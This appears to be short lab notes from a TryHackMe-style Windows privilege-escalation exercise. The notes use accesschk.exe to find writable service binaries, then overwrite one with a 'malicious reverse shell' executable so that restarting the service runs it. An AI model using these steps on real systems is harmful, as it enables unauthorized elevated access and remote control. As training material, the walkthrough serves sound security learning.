we will check if we have write access to any files

.\\accesschk.exe -accepteula -wus "Users" c:\\*.* > c:\\rto\\fld-usr.txt

now let’s check the output

Untitled

now this file don’t seem like it is useful

so let’s try to search as authenticated users

.\\accesschk.exe -accepteula -wus "Authenticated Users" c:\\*.* > c:\\rto\\fld-authusr.txt

and now let’s see the output

Untitled

as we see now this results is promising as we have read and write access to the ssh service and also the bginfo.exe which is reasonable for the background on windows

let’s take a look at the tryhackme example

.\\accesschk.exe -accepteula -wus "Users" c:\\*.* > c:\\privesc\\fld-usr.txt

now let’s see the output

Untitled

as we see we have read and write permissions for this service

now let’s copy a malicious reverse shell to this path and name it filepermservice.exe (because that is the name of the executable)

copy C:\\PrivEsc\\esc.exe "C:\\Program Files\\File Permissions Service\\filepermservice.exe" /Y

Untitled

now let’s run the service